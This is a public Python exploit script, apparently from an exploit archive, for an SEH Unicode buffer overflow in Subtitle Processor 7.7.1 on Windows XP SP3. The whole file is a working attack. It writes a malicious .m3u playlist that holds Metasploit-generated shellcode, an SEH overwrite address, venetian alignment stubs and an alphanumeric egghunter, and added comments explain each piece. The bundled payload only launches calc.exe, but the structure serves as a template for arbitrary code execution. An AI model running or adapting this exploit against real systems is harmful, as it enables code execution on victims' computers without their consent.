Subtitle Processor 7.7.1 SEH Unicode Buffer Overflow
Posted on 28 April 2011
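#!/usr/bin/python
# I wanted to first of all thank all the people who took the time to help me.
# Peter Van Eeckhoutte AKA corelanc0d3r. Awesome tutorials and thanks for putting up with me!
# Jason Kratzer. Thanks a lot for helping me finish this exploit and showing me techniques!
#
# Subtitle Processor 7.7.1 SEH Unicode Buffer Overflow
# Download: http://sourceforge.net/projects/subtitleproc/
# Version 7.7.1
# Author: Brandon Murphy
# Tested on Windows XP Pro SP3
# Author notified of vulnerability by email 12/11/2010
# No reply from author: Released exploit to public 4/26/2011
#
# Proof-of-concept generator: writes an oversized .m3u playlist that
# overwrites the application's SEH record.  The target widens the file's
# bytes to UTF-16 (a 0x00 is inserted after every byte), which is why the
# two handler bytes "\xb4\x57" below reach the stack as 0x005700b4 and why
# the alignment/jump stubs are built "venetian" style from single bytes that
# survive the expansion.  Control then lands on an alphanumeric egghunter
# which scans memory for the tag and runs the shellcode stored behind it.
#
# Layout of the generated file (offsets derived from the sizes below):
#     0  junk        70 x 0x41
#    70  tag         8-byte egg marker
#    78  shellcode   469 bytes (msfpayload windows/exec CMD=calc.exe)
#   547  junk2       3531 x 0x41
#  4078  nseh        2 bytes
#  4080  seh         2 bytes -> pop/pop/ret 0x005700b4 after expansion
#  4082  align       13 bytes
#  4095  jmp         3 bytes
#  4098  junk3       108 x 0x44
#  4206  egghunter   alphanumeric, Unicode-compatible
#
# All pieces are kept as bytes and the file is written in binary mode, so the
# script behaves the same under Python 2 and 3 and no byte >= 0x80 is altered
# by a text-mode encoding step (the original wrote str through mode "w").

# Filler up to the egg.
junk = b"\x41" * 70

# Egg marker: the 4-byte tag "s1ck" written twice, the pattern the egghunter
# at the end of the file presumably searches for.  The shellcode must follow
# it directly.
tag = b"s1cks1ck"

# msfpayload windows/exec CMD=calc.exe 496
# NOTE(review): the blob as transcribed is 469 bytes; the "496" above looks
# like a transposition.  The offsets in this file are computed from the real
# length, so do not "pad" it to 496.
shellcode = (
    b"\x89\xe5\xdd\xc2\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49\x43"
    b"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
    b"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
    b"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
    b"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d\x38\x4d\x59\x43\x30"
    b"\x45\x50\x45\x50\x45\x30\x4b\x39\x5a\x45\x50\x31\x58\x52\x43"
    b"\x54\x4c\x4b\x50\x52\x56\x50\x4c\x4b\x56\x32\x54\x4c\x4c\x4b"
    b"\x51\x42\x52\x34\x4c\x4b\x54\x32\x56\x48\x54\x4f\x4e\x57\x51"
    b"\x5a\x56\x46\x56\x51\x4b\x4f\x56\x51\x49\x50\x4e\x4c\x47\x4c"
    b"\x43\x51\x43\x4c\x45\x52\x56\x4c\x51\x30\x49\x51\x58\x4f\x54"
    b"\x4d\x43\x31\x58\x47\x4b\x52\x5a\x50\x56\x32\x50\x57\x4c\x4b"
    b"\x56\x32\x52\x30\x4c\x4b\x51\x52\x47\x4c\x45\x51\x58\x50\x4c"
    b"\x4b\x47\x30\x43\x48\x4c\x45\x4f\x30\x43\x44\x51\x5a\x43\x31"
    b"\x58\x50\x50\x50\x4c\x4b\x51\x58\x45\x48\x4c\x4b\x56\x38\x47"
    b"\x50\x45\x51\x49\x43\x4b\x53\x47\x4c\x51\x59\x4c\x4b\x50\x34"
    b"\x4c\x4b\x45\x51\x49\x46\x56\x51\x4b\x4f\x50\x31\x49\x50\x4e"
    b"\x4c\x4f\x31\x58\x4f\x54\x4d\x45\x51\x49\x57\x50\x38\x4b\x50"
    b"\x54\x35\x4c\x34\x45\x53\x43\x4d\x4c\x38\x47\x4b\x43\x4d\x56"
    b"\x44\x54\x35\x5a\x42\x51\x48\x4c\x4b\x50\x58\x51\x34\x45\x51"
    b"\x58\x53\x45\x36\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x51\x48\x45"
    b"\x4c\x43\x31\x58\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x4e\x30"
    b"\x4b\x39\x51\x54\x47\x54\x51\x34\x51\x4b\x51\x4b\x43\x51\x50"
    b"\x59\x50\x5a\x50\x51\x4b\x4f\x4b\x50\x51\x48\x51\x4f\x51\x4a"
    b"\x4c\x4b\x54\x52\x5a\x4b\x4b\x36\x51\x4d\x52\x4a\x43\x31\x4c"
    b"\x4d\x4d\x55\x4f\x49\x43\x30\x45\x50\x43\x30\x50\x50\x43\x58"
    b"\x50\x31\x4c\x4b\x52\x4f\x4b\x37\x4b\x4f\x4e\x35\x4f\x4b\x5a"
    b"\x50\x4e\x55\x4f\x52\x50\x56\x43\x58\x49\x36\x4c\x55\x4f\x4d"
    b"\x4d\x4d\x4b\x4f\x58\x55\x47\x4c\x43\x36\x43\x4c\x54\x4a\x4d"
    b"\x50\x4b\x4b\x4b\x50\x43\x45\x54\x45\x4f\x4b\x50\x47\x54\x53"
    b"\x54\x32\x52\x4f\x43\x5a\x43\x30\x51\x43\x4b\x4f\x49\x45\x52"
    b"\x43\x43\x51\x52\x4c\x45\x33\x56\x4e\x52\x45\x52\x58\x45\x35"
    b"\x43\x30\x41\x41"
)

# Filler from the end of the shellcode up to the SEH record (offset 4078).
junk2 = b"\x41" * 3531

# Next-SEH pointer: two bytes that, once widened, execute harmlessly so that
# execution flows into `align`.
nseh = b"\x61\x62"

# ppr 005700b4 Subtitleprocessor.exe
# Only the low bytes are stored; the 0x00s come from the Unicode expansion.
# NOTE(review): this is an address inside the main executable of this exact
# build, found on XP SP3 -- re-locate it for any other version or OS.
seh = b"\xb4\x57"

# Venetian
# Align:
# add byte ptr [esi],ch - \x6e
# pop ebp - \x55
# add byte ptr [esi],ch - \x6e
# pop eax - \x58
# add byte ptr [esi],ch - \x6e
# add eax,0x11001400 - \x05\x14\x11
# add byte ptr [esi],ch - \x6e
# sub eax,0x11001300 - \x2d\x13\x11
# add byte ptr [esi],ch - \x6e
#
# Jump:
# push eax - \x50
# add byte ptr [esi],ch - \x6e
# ret - \xc3
#
# (the \x6e bytes are the padding the author lists between instructions;
# after expansion each one becomes the harmless `add byte ptr [esi],ch`)
align = b"\x6e\x55\x6e\x58\x6e\x05\x14\x11\x6e\x2d\x13\x11\x6e"
jmp = b"\x50\x6e\xc3"

# Padding between the jump stub and the egghunter.
junk3 = b"\x44" * 108

# Alphanumeric (Unicode-safe) egghunter; every byte is printable ASCII so it
# survives the widening untouched.
egghunter = (
    b"PPYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58A"
    b"APAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB1V3Q7ZKOLO0B0R1ZKR0X8MNNOLKU0Z2TJO6X2S011S2K4KJZ6O2U9Z6O2U9WKO9WKPA"
)


def build_payload():
    """Concatenate the pieces above in file order.

    Returns the complete .m3u contents as bytes.  Purely computational: no
    I/O, so it can be inspected or tested without touching the filesystem.
    """
    parts = [junk, tag, shellcode, junk2, nseh, seh, align, jmp, junk3, egghunter]
    return b"".join(parts)


# Kept at module level (as in the original script) for anyone poking at it
# from an interactive session.
payload = build_payload()


def write_exploit(path="exploit.m3u"):
    """Write `payload` to *path* in binary mode.

    Returns True when the file was written.  On an I/O error (unwritable
    directory, permission problem, ...) the original failure banner is printed
    followed by the OS error text, and False is returned.  Only I/O errors are
    caught -- anything else is a bug and should surface.
    """
    try:
        with open(path, "wb") as fh:
            fh.write(payload)
    except (IOError, OSError) as err:
        print("[-] Something went wrong...</3")
        print("    %s" % err)
        return False
    print("[+] Go Go Gadget SEH unicode!")
    return True


def main():
    """Print the banner and drop exploit.m3u in the current directory."""
    print("#=========================================================#")
    print("# Subtitle Processor 7.7.1 SEH Unicode Buffer Overflow #")
    print("# Vulnerability found & exploit written by Brandon Murphy #")
    print("# Fallow: @MK1234Tfan #")
    print("#=========================================================#")
    write_exploit("exploit.m3u")


if __name__ == "__main__":
    main()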
